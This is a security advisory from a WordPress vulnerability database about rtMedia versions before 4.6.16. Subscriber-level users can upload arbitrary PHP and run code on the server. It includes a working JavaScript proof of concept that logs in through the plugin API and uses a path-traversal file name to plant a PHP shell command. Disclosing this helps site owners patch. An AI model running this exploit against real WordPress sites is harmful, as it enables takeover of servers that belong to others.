WordPress Plugin Vulnerabilities
rtMedia for WordPress, BuddyPress and bbPress < 4.6.16 - Subscriber+ RCE
Description
The plugin does not validate files to be uploaded, which could allow attackers with a low-privilege account (e.g. subscribers) to upload arbitrary files such as PHP on the server
Proof of Concept
If plugin JSON API is enabled, any logged-in user may execute arbitrary code by uploading a PHP file. After enabling the API in settings and installing buddypress, run the following code, replacing the username, password, and server path as needed.
fetch("/wp-admin/admin-ajax.php?action=rtmedia_api", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": "method=wp_login&username=USERNAME&password=PASSWORD",
"method": "POST",
}).then((response) => {
return response.json();
}).then((data) => {
const formData = new FormData()
formData.append('rtmedia_file', btoa('<?php system("ps"); ?>'));
formData.append('method', 'rtmedia_upload_media');
formData.append('image_type', './../../../../../var/www/html/wp-content/rce.php');
formData.append('title', '../');
formData.append('token', data.data.access_token);
fetch('/wp-admin/admin-ajax.php?action=rtmedia_api', {
method: 'POST',
body: formData
});
});
Affects Plugins
Fixed in 4.6.16 References
CVE
Miscellaneous
Original Researcher
Krzysztof Zając (CERT PL)
Submitter
Krzysztof Zając (CERT PL)
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-11-29 (about 5 months ago)
Added
2023-11-29 (about 5 months ago)
Last Updated
2023-11-29 (about 5 months ago)
WPScan 